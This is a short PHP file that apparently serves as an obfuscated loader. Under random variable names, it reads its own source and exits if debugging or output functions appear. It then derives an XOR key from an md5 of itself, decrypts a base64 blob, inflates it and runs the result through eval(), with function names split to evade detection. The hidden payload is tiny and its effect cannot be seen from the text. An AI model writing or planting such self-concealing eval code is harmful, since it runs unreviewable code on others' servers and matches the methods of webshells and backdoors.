<?php
$vzgwif="b8fdf6d9620ccd143b22043bdf752051";
$emctzh="015a55505500055f050553055a07090700520003520d56555d5e040d50525652";
$ucnrdrl="sJf4w3gbrq//fGZm";
$jbgrisn=file_get_contents(__FILE__);
$jgvkfrtog=str_replace($ucnrdrl,"",$jbgrisn);
if(strpos($jgvkfrtog,"ec"."ho")!==false||strpos($jgvkfrtog,"pr"."int")!==false||strpos($jgvkfrtog,"var_"."dump")!==false||strpos($jgvkfrtog,"file_put_"."contents")!==false||strpos($jgvkfrtog,"fw"."rite")!==false){die();}
$hoojhzh=str_replace(array($vzgwif,$emctzh),array("SP_c9cba948","KP_1f81269e"),$jbgrisn);
$szguurpsbh=md5($hoojhzh);
$gbkrbxmt=hex2bin($emctzh);
$fecjlaq="";
$llxxorec=strlen($szguurpsbh);
for($uuripvaiztd=0;$uuripvaiztd<$llxxorec;$uuripvaiztd++){
    $fecjlaq.=chr(ord($gbkrbxmt[$uuripvaiztd])^ord($szguurpsbh[$uuripvaiztd]));
}
$ptdunugymzvb=base64_decode($ucnrdrl);
$uilwdpzasf=strlen($ptdunugymzvb);
$sbpmqrwoj="";
$uurminfe=strlen($fecjlaq);
for($uuripvaiztd=0;$uuripvaiztd<$uilwdpzasf;$uuripvaiztd++){
    $sbpmqrwoj.=$ptdunugymzvb[$uuripvaiztd]^$fecjlaq[$uuripvaiztd%$uurminfe];
}
$kguuso="gz"."in"."fl"."ate";
eval($kguuso($sbpmqrwoj));
